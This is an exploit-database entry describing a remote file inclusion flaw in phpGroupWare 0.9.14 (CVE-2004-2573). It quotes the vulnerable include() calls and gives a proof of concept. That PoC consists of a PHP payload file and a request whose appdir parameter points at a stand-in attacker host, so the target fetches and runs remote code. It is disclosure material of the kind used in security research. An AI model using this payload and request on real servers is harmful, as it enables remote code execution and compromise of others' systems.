[] NeoSense
E X P L O I T S
title author type platform port cve id

phpGroupWare 0.9.14 - 'Tables_Update.Inc.php' Remote File Inclusion

Author: Cedric Cochin
type: webapps
platform: php
port: 
date_added: 2004-01-27 
date_updated: 2013-04-27 
verified: 1 
codes: CVE-2004-2573;OSVDB-7599 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/12074/info

phpGroupWare is prone to a remote file include vulnerability, potentially allowing the execution of malicious PHP code. This would occur in the context of the affected web server.

The tables_update.inc.php script contains the following include calls:
/* Include older phpGroupWare update support */
include($appdir . 'tables_update_0_9_9.inc.php');
include($appdir . 'tables_update_0_9_10.inc.php');
include($appdir . 'tables_update_0_9_12.inc.php');

For example supplying the following file:
tables_update_0_9_9.inc.php = <?php print "<?php phpinfo();?>" ;?>

The following request will execute the phpinfo() command on the vulnerable target:

http://[victim]/[phpgroupware_directory]/phpgwapi/setup/tables_update.inc.php?appdir=http://[attacker]/
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.